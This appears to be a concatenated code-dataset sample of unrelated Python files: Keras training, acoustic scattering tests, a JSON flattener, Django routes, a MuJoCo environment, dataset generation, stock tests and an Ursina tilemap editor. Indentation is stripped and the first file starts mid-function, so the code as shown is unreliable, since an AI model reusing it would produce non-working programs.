label_path = '/home/ailab/YI ZENG/Research/Classified/tra/DTrafficR/2_FusionedDataset/Numpy/label_norm8CLS_ALL.npy'
data = np.load(data_path)
data = data.reshape([-1, 28, 28, 1])
label_n = np.load(label_path)
print('data的数量', data.shape)
print('label的数量', label_n.shape)
print(label_n[1:10])
print("label的格式为:", type(label_n))
x_train = data[:12417]
y_train = label_n[:12417]
x_test = data[12417:]
y_test = label_n[12417:]
# 数据归一化到【0:255】
x_test = x_test * 256
self.x_test = x_test.astype(int)
x_train = x_train * 256
self.x_train = x_train.astype(int)
y_train = keras.utils.to_categorical(y_train, self.num_classes)
y_test = keras.utils.to_categorical(y_test, self.num_classes)
self.y_test = y_test.astype(int)
self.y_train = y_train.astype(int)
# 模型
model = self.build_model()
model.summary()
# 参数文件夹保存
mkdir(self.model_filename + 'date_' + datetime.datetime.now().strftime("%Y%m%d-%H%M%S"))
# 训练
change_lr = LearningRateScheduler(self.scheduler)
checkpoint = ModelCheckpoint(
self.model_filename + 'date_' + datetime.datetime.now().strftime(
"%Y%m%d-%H%M%S") + '/' + 'epoch_' + '{epoch:02d}' + '_val_acc_' + '{val_acc:.4f}' + '.h5',
monitor='val_acc',
verbose=0,
save_best_only=True,
mode='auto',
period=5)
# plot_callback = PlotLearning()
tb_cb = TensorBoard(
log_dir=self.log_filepath + 'date_' + datetime.datetime.now().strftime(
"%Y%m%d-%H%M%S") + '_conv_l1_' + str(self.conv_l1_regularizer) + '_lstm_l1_' + str(
self.conv_l1_regularizer),
histogram_freq=0)
# lr change
reduce_lr = ReduceLROnPlateau(monitor='val_acc', factor=0.5, verbose=1,
patience=self.patience, min_lr=self.end_lr)
# SGDR_lr = LR_Cycle(5000, 2)
cbks = [checkpoint, tb_cb, reduce_lr]
print('Using real-time data augmentation.')
# datagen = ImageDataGenerator(horizontal_flip=False,
# width_shift_range=0.01, height_shift_range=0.01, fill_mode='constant', cval=0.)
#
# datagen.fit(x_train)
# start traing
# model.fit_generator(datagen.flow(x_train, y_train,batch_size=self.batch_size),
# steps_per_epoch=59,
# verbose=2,
# epochs=self.epochs,
# callbacks=cbks,
# validation_data=(x_test, y_test))
# start traing
model.fit(x=self.x_train, y=self.y_train,
batch_size=self.batch_size,
epochs=self.epochs,
callbacks=cbks,
verbose=2,
validation_data=(self.x_test, self.y_test),
)
# save model
model.save(self.model_filename + '.h5')
self._model = model
def predict(self, img):
return self._model.predict(img, batch_size=self.batch_size)
def predict_one(self, img):
return self.predict(img)[0]
def accuracy(self):
return self._model.evaluate(self.x_test, self.y_test, verbose=0)[1]
if __name__ == '__main__':
DFR = DFR_model()
DFR.train()
print(DFR.accuracy())
# best(val_acc:97): 0。003 0。001 0.000001/
# goaled: 0.01 0.0005 0.0000001/0.003 0.003 0.000001/0。01 0。005 /0。003 0。001 0.000001/0.001 0.00013 0.0001
# failed: 0.01 0.001 0.000001/
|
StarcoderdataPython
|
163987
|
<filename>novice_stakes/tests/iso_speed_KA_sin.py
import numpy as np
import numexpr as ne
from math import pi
from scipy.optimize import newton
from scipy.signal import hilbert
from scipy.special import hankel2
import matplotlib.pyplot as plt
from novice_stakes import p_sca, initialize_nuttall
from novice_stakes.refraction import IsoSpeedFan, p_sca_KA_fan, initialize_axes
from novice_stakes.periodic_scatter import CosineRs, make_theta_axis
plt.ion()
z_src = -105
z_rcr = -15
x_rcr = 460
# Sinusoid paramters
H = 2.
L = 40.
c = 1500
fc = 1e3
fs = 2.25e3 * 2
tau_lim = 40e-3
# compute time/frequency domain parameters
faxis, dx, sig_FT = initialize_nuttall(fc, fs, c, tau_lim)
# compute source and receiver ray fans
num_rays = 2000
theta_max = 0.1 * (pi / 180)
dz_iso = 5
ray_src = IsoSpeedFan(c, z_src + dz_iso, num_rays, theta_max)
ray_rcr = IsoSpeedFan(c, z_rcr + dz_iso, num_rays, theta_max)
# setup xaxis
xaxis, yaxis, tau_img = initialize_axes(ray_src, ray_rcr, tau_lim, x_rcr, dx, dz_iso=dz_iso)
# 1 and 2D surfaces
K = 2 * pi / L
eta = (H / 2) * np.cos(K * xaxis)
eta_dx = -(H * K / 2) * np.sin(K * xaxis)
# 2-D calculations
eta_2D = np.broadcast_to(eta[:, None], (xaxis.size, yaxis.size))
eta_dx_2D = np.broadcast_to(eta_dx[:, None], (xaxis.size, yaxis.size))
eta_p = np.array([eta_dx_2D, np.zeros_like(eta_dx_2D)])
# stationary phase results
p_sta_fan, t_rcr_sta, _ = p_sca_KA_fan(ray_src, ray_rcr, xaxis, x_rcr,
eta, eta_dx, tau_img, tau_lim, faxis, sig_FT,
dz_iso=dz_iso)
# line source result
kc = 2 * pi * fc / c
p_ls_fan, t_rcr_1D, p_ref = p_sca_KA_fan(ray_src, ray_rcr, xaxis, x_rcr,
eta, eta_dx,
tau_img, tau_lim, faxis, sig_FT,
kc=kc, dz_iso=dz_iso)
# 2-D result
p_2D_fan, t_rcr_2D, _ = p_sca_KA_fan(ray_src, ray_rcr, xaxis, x_rcr,
eta_2D, eta_p,
tau_img, tau_lim, faxis, sig_FT,
yaxis=yaxis, dz_iso=dz_iso)
# Analytical expressions for isospeed case
# 1-D calculations
# compute full source vector for projection
r_src = np.array([xaxis, eta - z_src])
d_src = np.linalg.norm(r_src, axis=0)
n = np.array([-eta_dx, np.ones_like(xaxis)])
proj_src = np.einsum('ik,ik->k', n, r_src) / d_src
# greens function from source
kaxis = 2 * pi * faxis[:, None] / c
dpdn_g_as_point = -1j * kaxis * proj_src / (4 * pi * d_src) \
* np.exp(-1j * kaxis * d_src)
dpdn_g_as_line = -(1j / 4) * kaxis * proj_src * hankel2(1, kaxis * d_src)
# receiver vector
d_rcr = np.sqrt((x_rcr - xaxis) ** 2 + (z_rcr - eta) ** 2)
g_ra_point = np.exp(-1j * kaxis * d_rcr) / (4 * pi * d_rcr)
g_ra_line = (1j / 4) * hankel2(0, kaxis * d_rcr)
# 2-D calculations
# compute full 2D source vector for projection
r_src = np.array([*np.meshgrid(xaxis, yaxis, indexing='ij'), eta_2D - z_src])
d_src_2D = np.linalg.norm(r_src, axis=0)
n = np.array([-eta_dx_2D, np.zeros_like(eta_dx_2D), np.ones_like(eta_2D)])
proj_src_2D = np.einsum('ijk,ijk->jk', n, r_src) / d_src_2D
r_rcr = np.array([*np.meshgrid(x_rcr - xaxis, yaxis, indexing='ij'), z_rcr - eta_2D])
d_rcr_2D = np.linalg.norm(r_rcr, axis=0)
# greens function from source
k_ = 2 * pi * faxis[:, None, None] / c
ds_ = d_src_2D[None, :, :]
dr_ = d_rcr_2D[None, :, :]
ne_str = '-1j * k_ * proj_src_2D / (4 * pi * ds_) * exp(-1j * k_ * ds_)'
dpdn_g_as_2D = ne.evaluate(ne_str)
ne_str = 'exp(-1j * k_ * dr_) / (4 * pi * dr_)'
g_ra_2D = ne.evaluate(ne_str)
# surface integral for pressure at receiver
# 1-D geometry
kc = 2 * pi * fc / c
p_rcr_1D, taxis_1D = p_sca(2 * dpdn_g_as_line,
g_ra_line,
dx,
sig_FT,
faxis,
(d_src + d_rcr) / c,
tau_img,
tau_lim,
spreading=kc)
# stationary phase
# compute spreading factor for stationary phase approximation
# second derivative of (d_src + d_rcr) wrt y
d2d = (1 / d_src + 1 / d_rcr) / c
p_rcr_sta, taxis_sta = p_sca(2 * dpdn_g_as_point,
g_ra_point,
dx,
sig_FT,
faxis,
(d_src + d_rcr) / c,
tau_img,
tau_lim,
spreading=d2d)
# 2D integration
p_rcr_2D, taxis_2D = p_sca(2 * dpdn_g_as_2D,
g_ra_2D,
dx,
sig_FT,
faxis,
(d_src_2D + d_rcr_2D) / c,
tau_img,
tau_lim)
# Wave number synthesis for pressure at receiver
eva_range = 0.1
num_eva = 10
numquad = 50000
# vector element formulation used in periodic solution
rsrc = np.array([0., z_src])
rrcr = np.array([x_rcr, z_rcr])
def p_KA(facous, rANA, sol_type='KA'):
# periodic scatter solution
tcoarse = make_theta_axis(2000, eva_range)
if sol_type == 'KA':
func = rANA.hka_coefficents
else:
func = rANA.rfm_1st
r0, q0 = func(tcoarse[0], facous, num_eva)
rn1, qn1 = func(tcoarse[-1], facous, num_eva)
all_qs = np.unique(np.hstack([q0, qn1]))
one_freq = np.zeros((tcoarse.size, all_qs.size), dtype=np.complex_)
one_freq[0, np.isin(all_qs, q0)] = r0
one_freq[-1, np.isin(all_qs, qn1)] = rn1
for i, t in enumerate(tcoarse[1: -1]):
r, q = func(t, facous, num_eva)
one_freq[i + 1, np.isin(all_qs, q)] = r
print('computing freq {}'.format(facous))
p_sca = rANA.bragg.quad(all_qs, tcoarse, one_freq, numquad, eva_range, rsrc,
rrcr, facous)
return p_sca
rANA = CosineRs(H, L, attn=1e-9)
start_phase = -1j * 2 * np.pi * faxis * taxis_1D[0]
p_FT_KA = np.zeros(faxis.size, dtype=np.complex)
fci = faxis > 1
p_FT_KA[fci] = np.squeeze(np.array([p_KA(f, rANA, sol_type='RFM') for f in faxis[fci]]))
channel_FD = p_FT_KA * np.conj(sig_FT)
p_wn_KA = np.fft.irfft(np.conj(np.exp(start_phase) * channel_FD), axis=0)
fig, ax = plt.subplots()
p_dB = 20 * (np.log10(np.abs(hilbert(p_wn_KA)) + np.spacing(1))
- np.log10(np.abs(p_ref)))
plt.plot(taxis_1D - tau_img, p_dB)
p_dB = 20 * (np.log10(np.abs(hilbert(p_rcr_1D)) + np.spacing(1))
- np.log10(np.abs(p_ref)))
plt.plot(taxis_1D - tau_img, p_dB)
num_tail = 35
def ts_error(ts, ts_ref, num_tail):
"""Error metric used to compare time series"""
error_norm = np.max(np.abs(ts_ref[:-num_tail]))
error = np.max(np.abs(ts[:-num_tail] - ts_ref[:-num_tail]))
return error / error_norm
# max allowed relative error
max_error = 0.001
# check line source soutions
assert(ts_error(p_ls_fan, p_rcr_1D, num_tail) < max_error)
# check point source solutions
assert(ts_error(p_rcr_sta, p_rcr_sta, num_tail) < max_error)
assert(ts_error(p_rcr_2D, p_rcr_sta, num_tail) < max_error)
assert(ts_error(p_2D_fan, p_rcr_sta, num_tail) < max_error)
print('All iso-speed sinusoidal surface tests passed')
|
StarcoderdataPython
|
1686355
|
<filename>piano_utils/utils/flatten_json.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
MIT License
Copyright (c) 2016 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import sys
from collections import Iterable
def check_if_numbers_are_consecutive(list_):
"""
Returns True if numbers in the list are consecutive
:param list_: list of integers
:return: Boolean
"""
return all([True if second - first == 1 else False
for first, second in zip(list_[:-1], list_[1:])])
def _construct_key(previous_key, separator, new_key):
"""
Returns the new_key if no previous key exists, otherwise concatenates previous key, separator, and new_key
:param previous_key:
:param separator:
:param new_key:
:return: a string if previous_key exists and simply passes through the new_key otherwise
"""
if previous_key:
return "{}{}{}".format(previous_key, separator, new_key)
else:
return new_key
def flatten(nested_dict, separator="_", root_keys_to_ignore=set()):
"""
Flattens a dictionary with nested structure to a dictionary with no hierarchy
Consider ignoring keys that you are not interested in to prevent unnecessary processing
This is specially true for very deep objects
:param nested_dict: dictionary we want to flatten
:param separator: string to separate dictionary keys by
:param root_keys_to_ignore: set of root keys to ignore from flattening
:return: flattened dictionary
"""
assert isinstance(nested_dict, dict), "flatten requires a dictionary input"
assert isinstance(separator, str), "separator must be a string"
# This global dictionary stores the flattened keys and values and is ultimately returned
flattened_dict = dict()
def _flatten(object_, key):
"""
For dict, list and set objects_ calls itself on the elements and for other types assigns the object_ to
the corresponding key in the global flattened_dict
:param object_: object to flatten
:param key: carries the concatenated key for the object_
:return: None
"""
if isinstance(object_, dict):
for object_key in object_:
if not (not key and object_key in root_keys_to_ignore):
_flatten(object_[object_key], _construct_key(key, separator, object_key))
elif isinstance(object_, list) or isinstance(object_, set):
for index, item in enumerate(object_):
_flatten(item, _construct_key(key, separator, index))
else:
flattened_dict[key] = object_
_flatten(nested_dict, None)
return flattened_dict
flatten_json = flatten
def _unflatten_asserts(flat_dict, separator):
assert isinstance(flat_dict, dict), "un_flatten requires a dictionary input"
assert isinstance(separator, str), "separator must be a string"
assert all((not isinstance(value, Iterable) or isinstance(value, str) or isinstance(value, unicode)
for value in flat_dict.values())), "provided dictionary is not flat"
def unflatten(flat_dict, separator='_'):
"""
Creates a hierarchical dictionary from a flattened dictionary
Assumes no lists are present
:param flat_dict: a dictionary with no hierarchy
:param separator: a string that separates keys
:return: a dictionary with hierarchy
"""
_unflatten_asserts(flat_dict, separator)
# This global dictionary is mutated and returned
unflattened_dict = dict()
def _unflatten(dic, keys, value):
for key in keys[:-1]:
dic = dic.setdefault(key, {})
dic[keys[-1]] = value
for item in flat_dict:
_unflatten(unflattened_dict, item.split(separator), flat_dict[item])
return unflattened_dict
def unflatten_list(flat_dict, separator='_'):
"""
Unflattens a dictionary, first assuming no lists exist and then tries to identify lists and replaces them
This is probably not very efficient and has not been tested extensively
Feel free to add test cases or rewrite the logic
Issues that stand out to me:
- Sorting all the keys in the dictionary, which specially for the root dictionary can be a lot of keys
- Checking that numbers are consecutive is O(N) in number of keys
:param flat_dict: dictionary with no hierarchy
:param separator: a string that separates keys
:return: a dictionary with hierarchy
"""
_unflatten_asserts(flat_dict, separator)
# First unflatten the dictionary assuming no lists exist
unflattened_dict = unflatten(flat_dict, separator)
def _convert_dict_to_list(object_, parent_object, parent_object_key):
if isinstance(object_, dict):
try:
keys = [int(key) for key in object_]
keys.sort()
except (ValueError, TypeError):
keys = []
keys_len = len(keys)
if (keys_len > 0 and sum(keys) == int(((keys_len - 1) * keys_len) / 2) and keys[0] == 0 and
keys[-1] == keys_len - 1 and check_if_numbers_are_consecutive(keys)):
# The dictionary looks like a list so we're going to replace it as one
parent_object[parent_object_key] = [object_[str(key)] for key in keys]
for key in object_:
if isinstance(object_[key], dict):
_convert_dict_to_list(object_[key], object_, key)
_convert_dict_to_list(unflattened_dict, None, None)
return unflattened_dict
def cli(input_stream=sys.stdin, output_stream=sys.stdout):
import json
raw = input_stream.read()
input_json = json.loads(raw)
output = json.dumps(flatten(input_json))
output_stream.write(output)
if __name__ == '__main__':
cli()
|
StarcoderdataPython
|
9419
|
# Copyright 2005-2008, <NAME>
# Copyright 2010, 2012 <NAME>
# This software's license gives you freedom; you can copy, convey,
# propagate, redistribute, modify and/or redistribute modified versions of
# this program under the terms of the GNU Affero General Public License
# (AGPL) as published by the Free Software Foundation (FSF), either
# version 3 of the License, or (at your option) any later version of the
# AGPL published by the FSF.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero
# General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program in a file in the toplevel directory called
# "AGPLv3". If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls import url, include
from django.contrib import admin, admindocs
from conservancy import feeds, frontpage, sponsors
import conservancy.apps.fundgoal.views as fundgoal_views
import conservancy.static.views as static_views
admin.autodiscover()
urlpatterns = [
url(r'^$', frontpage.view),
url(r'^sponsors$', frontpage.view),
url(r'^sponsors/$', sponsors.view),
url(r'^sponsors/index.html$', sponsors.view),
url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
url(r'^admin/', admin.site.urls),
url(r'^feeds/blog/?$', feeds.BlogFeed()),
url(r'^feeds/news/?$', feeds.PressReleaseFeed()),
url(r'^feeds/omnibus/?$', feeds.OmnibusFeed()),
url(r'^feeds/?$', feeds.view),
url(r'^news(/|$)', include('conservancy.apps.news.urls')),
url(r'^blog(/|$)', include('conservancy.apps.blog.urls')),
# formerly static templated things... (dirs with templates)
url(r'^error/(40[134]|500)(?:/index\.html|/|)$', static_views.handler),
url(r'^error', static_views.index),
url(r'^about', static_views.index),
url(r'^donate', static_views.index),
url(r'^copyleft-compliance', static_views.index,
{'fundraiser_sought' : 'vmware-match-0'}),
url(r'^projects', static_views.index),
url(r'^npoacct', static_views.index,
{'fundraiser_sought' : 'npoacct'}),
url(r'^contractpatch', include('conservancy.apps.contractpatch.urls')),
url(r'^overview', static_views.index),
url(r'^privacy-policy', static_views.index),
url(r'^supporter', include('conservancy.apps.supporter.urls')),
url(r'^fundraiser_data', fundgoal_views.view),
]
|
StarcoderdataPython
|
22091
|
<reponame>zaynahjaved/AWAC<gh_stars>0
'''
All cartgripper env modules built on cartrgipper implementation in
https://github.com/SudeepDasari/visual_foresight
'''
from abc import ABC
from mujoco_py import load_model_from_path, MjSim
import numpy as np
from base_env import BaseEnv
class BaseMujocoEnv(BaseEnv, ABC):
def __init__(self, model_path, _hp):
super(BaseMujocoEnv, self).__init__()
self._frame_height = _hp.viewer_image_height
self._frame_width = _hp.viewer_image_width
self._reset_sim(model_path)
self._base_adim, self._base_sdim = None, None #state/action dimension of Mujoco control
self._adim, self._sdim = None, None #state/action dimension presented to agent
self.num_objects, self._n_joints = None, None
self._goal_obj_pose = None
self._goaldistances = []
self._ncam = _hp.ncam
if self._ncam == 2:
self.cameras = ['maincam', 'leftcam']
elif self._ncam == 1:
self.cameras = ['maincam']
else:
raise ValueError
self._last_obs = None
self._hp = _hp
def _default_hparams(self):
parent_params = super()._default_hparams()
parent_params['viewer_image_height'] = 256
parent_params['viewer_image_width'] = 256
parent_params['ncam'] = 1
return parent_params
def set_goal_obj_pose(self, pose):
self._goal_obj_pose = pose
def _reset_sim(self, model_path):
"""
Creates a MjSim from passed in model_path
:param model_path: Absolute path to model file
:return: None
"""
self._model_path = model_path
self.sim = MjSim(load_model_from_path(self._model_path))
def reset(self):
self._goaldistances = []
def render(self):
""" Renders the enviornment.
Implements custom rendering support. If mode is:
- dual: renders both left and main cameras
- left: renders only left camera
- main: renders only main (front) camera
:param mode: Mode to render with (dual by default)
:return: uint8 numpy array with rendering from sim
"""
images = np.zeros(
(self._ncam, self._frame_height, self._frame_width, 3),
dtype=np.uint8)
for i, cam in enumerate(self.cameras):
images[i] = self.sim.render(
self._frame_width, self._frame_height, camera_name=cam)
return images
@property
def adim(self):
return self._adim
@property
def sdim(self):
return self._sdim
@property
def ncam(self):
return self._ncam
|
StarcoderdataPython
|
161146
|
import os
import random
import yaml
from collections import Counter
from nltk.corpus import movie_reviews
from nltk.corpus import senseval
import pandas as pd
import json
class datasetGenerator:
"""
creates a base dataset from senseval in NLTK
it generates data.json dataset by instanciating it
or by retrieving data from https://github.com/sebischair/NLU-Evaluation-Corpora
create chatito https://rodrigopivi.github.io/Chatito/
"""
# TODO: consolidate dataflow to pandas dataframe y csv o yaml
def __init__(self, dataset="", size=200, filename="data.json", randomSeed=42):
if dataset == "":
if "json.data" in os.walk(os.path.join("..", "data", filename)):
return
else:
dataset = "senseval"
if dataset == "senseval":
self.instances = senseval.instances("hard.pos")
self.getDataNLTK()
self.sampleData(size, randomSeed)
self.saveData()
if (
dataset == "AskUbuntuCorpus"
or dataset == "ChatbotCorpus"
or dataset == "WebApplicationsCorpus"
):
self.getDataJson(dataset)
self.sampleData(size, randomSeed)
self.saveData()
if dataset not in [
"",
"senseval",
"AskUbuntuCorpus",
"ChatbotCorpus",
"WebApplicationsCorpus",
]:
raise Exception("not implemented other dataset than senseval")
def getDataNLTK(self):
self.labels = []
self.sentences = []
for instance in self.instances:
try:
self.sentences.append(
" ".join([i for i, _ in instance.context if i.isalpha()])
)
self.labels.append(instance.senses[0])
except:
pass
def getDataJson(self, filename):
with open(
os.path.join("..", "data", filename + ".json"), encoding="utf8"
) as datafile:
data = json.load(datafile)
df = pd.DataFrame(data["sentences"])
df = df.loc[df["intent"] != "None"]
df = self.changeToCompliantLabel(df)
self.labels = df.intent.tolist()
self.sentences = df.text.tolist()
def changeToCompliantLabel(self, df):
def getCompliantLabel(uniqueLabel):
return "".join([c for c in uniqueLabel if c.isalpha()])
self.uniqueLabels = df.intent.unique()
for uL in self.uniqueLabels:
df["intent"].replace(uL, getCompliantLabel(uL), inplace=True)
return df
def sampleData(self, size=200, randomSeed=42):
random.seed(randomSeed)
self.sampleList = random.sample(
range(len(self.sentences)), min(size, len(self.sentences))
)
self.sentences = [self.sentences[i] for i in self.sampleList]
self.labels = [self.labels[i] for i in self.sampleList]
self.uniqueLabels = dict(Counter(self.labels))
def saveData(self, filename="data.csv"):
df = pd.DataFrame(data={"sentences": self.sentences, "labels": self.labels})
df.to_csv(os.path.join("..", "data", "data.csv"), index=False)
if __name__ == "__main__":
a = datasetGenerator("AskUbuntuCorpus")
|
StarcoderdataPython
|
142721
|
<filename>test/cases/apps/stocking/actions_test.py
import sys
from pathlib import Path
sys.path.append(str(Path(__file__).parent.parent.parent.parent.parent))
from apps.stocking.actions.fetch import fetch_data
from apps.stocking import logger
from apps.stocking.actions.make import make_x, make_y, make_xy
from apps.stocking.estimators import y_categorifier
import pandas as pd
err_code = 'sh000789'
corr_code = 'sz000789'
ds = pd.read_csv(Path(__file__).parent.parent.parent.parent / 'fixtures/sz002415.csv',
index_col=0)
def test_fetch_data():
df = fetch_data(err_code)
assert df is None
df = fetch_data(corr_code)
logger.info(df)
assert len(df) > 2000
def test_make_x():
x = make_x(range(1, 5), ds, ['trade', 'turnover'], past_days=2)
assert x.iloc[0, 3] == x.iloc[1, 1]
assert len(x) == 4
assert len(x.columns) == 4
assert x.columns[0] == 'p1_trade'
cate_y = y_categorifier([{
"name": "下跌",
"threshold": -99999
}, {
"name": "涨0-3%",
"threshold": 0
}, {
"name": "涨3-6%",
"threshold": 0.03
}, {
"name": "涨6-10%",
"threshold": 0.06
}, {
"name": "涨超10%",
"threshold": 0.1
}])
def test_cate_y():
assert cate_y(0.01) == 1
assert cate_y(0.12) == 4
assert cate_y(0.08) == 3
assert cate_y(0.05) == 2
assert cate_y(-0.6) == 0
assert cate_y(-0.03) == 0
def test_make_y():
y, yvc = make_y(range(3, 100),
ds,
cols=['high', 'close'],
future_days=10,
categorify=cate_y)
assert y.iloc[0] == cate_y(float(yvc.iloc[0]['y_c'].replace('%', '')) / 100)
assert y.iloc[49] == cate_y(float(yvc.iloc[49]['y_c'].replace('%', '')) / 100)
assert y.iloc[65] == cate_y(float(yvc.iloc[65]['y_c'].replace('%', '')) / 100)
assert y.iloc[73] == cate_y(float(yvc.iloc[73]['y_c'].replace('%', '')) / 100)
|
StarcoderdataPython
|
1624292
|
from django.apps import AppConfig
class SchaftConfig(AppConfig):
name = 'schaft'
|
StarcoderdataPython
|
3315031
|
<reponame>LyfeOnEdge/ursina
from ursina import *
from ursina.prefabs.grid_editor import GridEditor, PixelEditor
import re
class Tilemap(GridEditor):
def __init__(self, tilemap='', tileset='', tileset_size=(8,8), **kwargs):
if isinstance(tilemap, str):
self.tilemap = load_texture(tilemap)
self.grid = [[self.tilemap.get_pixel(x,y) for y in range(self.tilemap.height)] for x in range(self.tilemap.width)]
super().__init__(
texture=self.tilemap,
size=self.tilemap.size,
palette=(color.white, color.black, color.green, color.blue, color.red),
edit_mode=False,
**kwargs)
self.tileset = tileset
self.tileset_size = tileset_size
self.model = Mesh()
self.texture = tileset
self.colliders = list()
# self.texture.filtering = None
# self.grid = [[self.tilemap.get_pixel(x,y) for y in range(self.h)] for x in range(self.w)]
self.auto_render = False
self.outline = Entity(parent=self, model=Quad(segments=0, mode='line', thickness=1), color=color.cyan, z=.01, origin=(-.5,-.5), enabled=self.edit_mode)
self._quad = Quad(segments=0)
self._quad.vertices = [Vec3(*v)+Vec3(.5,.5,0) for v in self._quad.vertices]
self._garbage = Entity(parent=self, add_to_scene_entities=False)
self.uv_dict = {
'11111111' : [(4,1), (5,1), (6,1), (7,1)], # fill
'0.11111.' : [(1,3), (2,3), (5,3), (6,3)], # top
'1.0.1111' : [(3,2), (3,1)], # right
'111.0.11' : [(2,0), (1,0), (6,2), (5,2)], # bot
'11111.0.' : [(0,1), (0,2)], # left
'000.111.' : [(3,3), ], # corner_top_right
'1.000.11' : [(3,0), ], # corner_bot_right
'111.000.' : [(0,0), ], # corner_bot_left
'0.111.00' : [(0,3), ], # corner_top_left
'10111111' : [(1,1), ], #inner_corner_bot_left
'11101111' : [(1,2), ], #inner_corner_top_left
'11111011' : [(2,2), ], #inner_corner_top_right
'11111110' : [(2,1), ], #inner_corner_bot_right
}
self.single_block_coordinates = [(4,0), (5,0), (6,0), (7,0)]
self.variation_chance = [0,0,0,0,1,1,1,2,2,3]
if 'min' in self.texture.name:
self.uv_dict = {
'11111111' : [(1,1)], # fill
'0.11111.' : [(1,2)], # top
'111.0.11' : [(1,0), ], # bot
'1.0.1111' : [(0,1), '-1,1'], # right
'11111.0.' : [(0,1)], # left
'0.111.00' : [(0,2), ], # corner_top_left
'000.111.' : [(0,2), '-1,1'], # corner_top_right
'1.000.11' : [(0,2), '-1,-1'], # corner_bot_right
'111.000.' : [(0,2), '1,-1'], # corner_bot_left
'11111110' : [(2,0), ], #inner_corner_bot_right
'10111111' : [(2,0), '-1,1'], #inner_corner_bot_left
'11111011' : [(2,1), ], #inner_corner_top_right
'11101111' : [(2,1), '-1,1'], #inner_corner_top_left
}
self.single_block_coordinates = [(2,2)]
self.variation_chance = [0,]
self.uv_margin = .002
self.render()
def update(self):
if not self.edit_mode:
return
super().update()
if mouse.left:
self.draw_temp(self.cursor.position)
def draw_temp(self, position):
e = Entity(
parent=self._garbage,
model='quad',
scale=Vec3(1/self.tilemap.width, 1/self.tilemap.height, 1) * self.brush_size,
position=self.cursor.position,
z=-.1,
texture=self.texture,
texture_scale=Vec2(1/self.tileset_size[0], 1/self.tileset_size[1]),
texture_offset=Vec2(.33, .33),
origin=(-.5,-.5),
ignore=True,
)
if self.selected_char == self.palette[0]:
e.color = window.color
e.texture = None
def input(self, key):
super().input(key)
if key == 'left mouse up':
for e in self._garbage.children:
destroy(e)
def render(self):
self.scale = self.tilemap.size
self.model.clear()
for e in self.colliders:
destroy(e)
self.colliders.clear()
tile_size = Vec2(1/self.tileset_size[0], 1/self.tileset_size[1])
i = 0
for y in range(self.tilemap.height):
collider = None
for x in range(self.tilemap.width):
col = self.grid[x][y]
if col == color.white and collider: # end collider
collider = None
if col != color.white: #
self.model.vertices.extend([Vec3(x/self.tilemap.width, y/self.tilemap.height, 0) + (v*1/self.tilemap.width) for v in self._quad.vertices]) # add quad vertices, but offset.
self.model.triangles.append([i+j for j in range(4)])
neighbours = list()
# register neighbours clockwise starting from the top
for offset in [(0,1), (1,1), (1,0), (1,-1), (0,-1), (-1,-1), (-1,0), (-1,1)]:
try:
neighbours.append(self.grid[x+offset[0]][y+offset[1]] != color.white)
except IndexError:
neighbours.append(1)
neighbours = ''.join([str(int(e)) for e in neighbours])
# if collider is None and neighbours != '11111111':
# collider = Entity(
# parent=self,
# model='cube',
# scale_x=Vec3(0, 1/self.tilemap.height, 1),
# origin_x=-.5,
# position=(x-.5, y/self.tilemap.height),
# collider='box',
# color=color.red
# )
# self.colliders.append(collider)
# if collider and neighbours == '11111111': # end collider if it's a middle block
# collider = None
# if collider:
# collider.scale_x += 1/self.tilemap.width
random.seed(y+x)
variation_index = random.choice(self.variation_chance)
tile_scale = '1,1'
for key, value in self.uv_dict.items():
if re.match(key, neighbours):
if isinstance(value[-1], str):
tile_scale = value[-1]
variation_index = min(variation_index, len(value)-1-int(tile_scale=='1,1'))
_x, _y = value[variation_index]
break
else:
_x, _y = self.single_block_coordinates[variation_index]
uv = [
Vec2(tile_size[0] * _x, tile_size[1] * _y) + Vec2(self.uv_margin, self.uv_margin),
Vec2(tile_size[0] * (_x+1), tile_size[1] * _y) + Vec2(-self.uv_margin, self.uv_margin),
Vec2(tile_size[0] * (_x+1), tile_size[1] * (_y+1)) + Vec2(-self.uv_margin, -self.uv_margin),
Vec2(tile_size[0] * _x, tile_size[1] * (_y+1)) + Vec2(self.uv_margin, -self.uv_margin),
]
if tile_scale == '1,1':
pass
elif tile_scale == '-1,1':
a, b, c, d = uv
uv = [b, a, d, c]
elif tile_scale == '1,-1':
a, b, c, d = uv
uv = [d, c, b, a]
elif tile_scale == '-1,-1':
a, b, c, d = uv
uv = [c, d, a, b]
self.model.uvs.extend(uv)
i += 4
self.model.generate() # call to create the mesh
def save(self):
for y in range(self.tilemap.height):
for x in range(self.tilemap.width):
self.tilemap.set_pixel(x, y, self.grid[x][y])
if self.tilemap.path:
self.tilemap.save(self.tilemap.path)
print('saving:', self.tilemap.path)
if __name__ == '__main__':
app = Ursina()
EditorCamera()
tilemap = Tilemap('tilemap_test_level', tileset='test_tileset', tileset_size=(8,4), parent=scene)
# tilemap = Tilemap('brick', tileset='tileset_cave', tileset_size=(8,4), parent=scene)
camera.orthographic = True
camera.position = tilemap.tilemap.size / 2
camera.fov = tilemap.tilemap.height
Text('press tab to toggle edit mode', origin=(.5,0), position=(-.55,.4))
app.run()
|
StarcoderdataPython
|
3216292
|
<gh_stars>0
# Databricks notebook source
# MAGIC %run ./app/bootstrap
# COMMAND ----------
